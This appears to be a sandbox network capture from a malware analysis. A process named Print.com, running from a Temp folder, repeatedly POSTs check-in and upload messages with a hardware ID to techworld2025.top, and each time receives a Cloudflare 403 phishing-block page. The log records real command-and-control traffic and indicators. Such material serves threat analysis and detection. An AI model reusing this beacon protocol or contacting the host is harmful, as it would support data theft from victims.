2025-03-07 15:24:15 UTC	572	IN	Data Raw: 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d Data Ascii: t>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-
2025-03-07 15:24:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49720	104.21.89.159	443	8160	C:\Users\user\AppData\Local\Temp\362398\Print.com

Timestamp	Bytes transferred	Direction	Data
2025-03-07 15:24:17 UTC	362	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: techworld2025.top
2025-03-07 15:24:17 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 45 65 71 39 51 2d 2d 74 77 6f 26 6a 3d Data Ascii: act=receive_message&ver=4.0&lid=AEeq9Q--two&j=
2025-03-07 15:24:17 UTC	566	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 15:24:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxzZe%2BEFkyQaMyAbsMxrUyuDaUuv8OWgAwx3JLepyCVChq%2FhRSTIacd%2Bi%2BmXdvXJekeGwSptQ06UV084reWCQWXv6BGtuZG2XUJJ1VVvZ7NOdU9jS%2Bvav6%2FQvTMTQGvnNIFXsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cb1952990cef9d-EWR
2025-03-07 15:24:17 UTC	803	IN	Data Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-07 15:24:17 UTC	1369	IN	Data Raw: 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c Data Ascii: cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getEl
2025-03-07 15:24:17 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <f
2025-03-07 15:24:17 UTC	1016	IN	Data Raw: 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 36 2e 39 39 2e 32 33 32 2e 31 30 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 Data Ascii: al" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">76.99.232.105</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><s
2025-03-07 15:24:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49721	104.21.89.159	443	8160	C:\Users\user\AppData\Local\Temp\362398\Print.com

Timestamp	Bytes transferred	Direction	Data
2025-03-07 15:24:19 UTC	374	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NO4F3NDEM6G3X Cookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2543 Host: techworld2025.top
2025-03-07 15:24:19 UTC	2543	OUT	Data Raw: 2d 2d 4e 4f 34 46 33 4e 44 45 4d 36 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 4e 4f 34 46 33 4e 44 45 4d 36 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 45 65 71 39 51 2d 2d 74 77 6f 0d 0a 2d 2d 4e 4f 34 46 33 4e 44 45 4d 36 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4f 34 46 33 4e 44 45 4d 36 47 33 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e Data Ascii: --NO4F3NDEM6G3XContent-Disposition: form-data; name="act"send_message--NO4F3NDEM6G3XContent-Disposition: form-data; name="lid"AEeq9Q--two--NO4F3NDEM6G3XContent-Disposition: form-data; name="pid"1--NO4F3NDEM6G3XContent-Disposition
2025-03-07 15:24:20 UTC	562	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 15:24:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ap1rHGx16Ok7kZqTVMYh3gLxGQaktPc8zZoOFs7eHMfc1teRGUxFeqViSHRP%2BjvWRbNwJ7Gmkm7ohYVMit51b5SxwH6WvKUgTaDWg%2FuYmlMasr8D%2F%2FNNmQBydkNVpaYNOFNuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cb19613cb3da8d-EWR
2025-03-07 15:24:20 UTC	807	IN	Data Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-07 15:24:20 UTC	1369	IN	Data Raw: 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
2025-03-07 15:24:20 UTC	1369	IN	Data Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
2025-03-07 15:24:20 UTC	1012	IN	Data Raw: 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 36 2e 39 39 2e 32 33 32 2e 31 30 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e Data Ascii: class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">76.99.232.105</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>
2025-03-07 15:24:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49722	104.21.89.159	443	8160	C:\Users\user\AppData\Local\Temp\362398\Print.com

Timestamp	Bytes transferred	Direction	Data
2025-03-07 15:24:22 UTC	378	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KBOPYHTP9Q114W12Q Cookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1091 Host: techworld2025.top
2025-03-07 15:24:22 UTC	1091	OUT	Data Raw: 2d 2d 4b 42 4f 50 59 48 54 50 39 51 31 31 34 57 31 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 4b 42 4f 50 59 48 54 50 39 51 31 31 34 57 31 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 45 65 71 39 51 2d 2d 74 77 6f 0d 0a 2d 2d 4b 42 4f 50 59 48 54 50 39 51 31 31 34 57 31 32 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 42 4f 50 59 48 54 50 39 51 31 31 34 57 31 32 51 0d 0a 43 6f 6e Data Ascii: --KBOPYHTP9Q114W12QContent-Disposition: form-data; name="act"send_message--KBOPYHTP9Q114W12QContent-Disposition: form-data; name="lid"AEeq9Q--two--KBOPYHTP9Q114W12QContent-Disposition: form-data; name="pid"1--KBOPYHTP9Q114W12QCon
2025-03-07 15:24:22 UTC	560	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 15:24:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHt4EIs%2B1WIeYqoKpzHRUMFdgnnEnOJgAdwhGCekE8cfQgiiWcsdINtvhuGZNbPwu4skWj6DoH83hu1ohlIWROwqIh8jdfIeuWewYDi9rB49DUywOHFOOs6%2FWxIIwMvAGFS%2Buw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cb196fe888c4fb-EWR
2025-03-07 15:24:22 UTC	809	IN	Data Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-07 15:24:22 UTC	1369	IN	Data Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
2025-03-07 15:24:22 UTC	1369	IN	Data Raw: 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form ac
2025-03-07 15:24:22 UTC	1010	IN	Data Raw: 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 36 2e 39 39 2e 32 33 32 2e 31 30 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 Data Ascii: ass="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">76.99.232.105</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Pe
2025-03-07 15:24:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49723	104.21.89.159	443	8160	C:\Users\user\AppData\Local\Temp\362398\Print.com

Timestamp	Bytes transferred	Direction	Data
2025-03-07 15:24:24 UTC	362	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: techworld2025.top
2025-03-07 15:24:24 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 45 65 71 39 51 2d 2d 74 77 6f 26 6a 3d 26 68 77 69 64 3d 39 33 33 38 43 46 30 41 41 33 42 46 39 38 38 36 33 42 37 46 39 33 44 44 34 39 35 43 34 35 41 37 Data Ascii: act=get_message&ver=4.0&lid=AEeq9Q--two&j=&hwid=9338CF0AA3BF98863B7F93DD495C45A7
2025-03-07 15:24:24 UTC	564	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 15:24:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rcjs%2FSr0MDl7%2BWdZ0DgANDlFGIjboHWwrk1ipmQ5KLGkAaucYbyNJQ%2B%2B3vPTv3xTKJ7dTiptmNYqL1mgLM6Pltb4nxiPPGlGkZ4bcJzVuWQzaF8QnFtEp%2FaG5TmJ0nYVqmvgkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cb197e5d6f1526-EWR
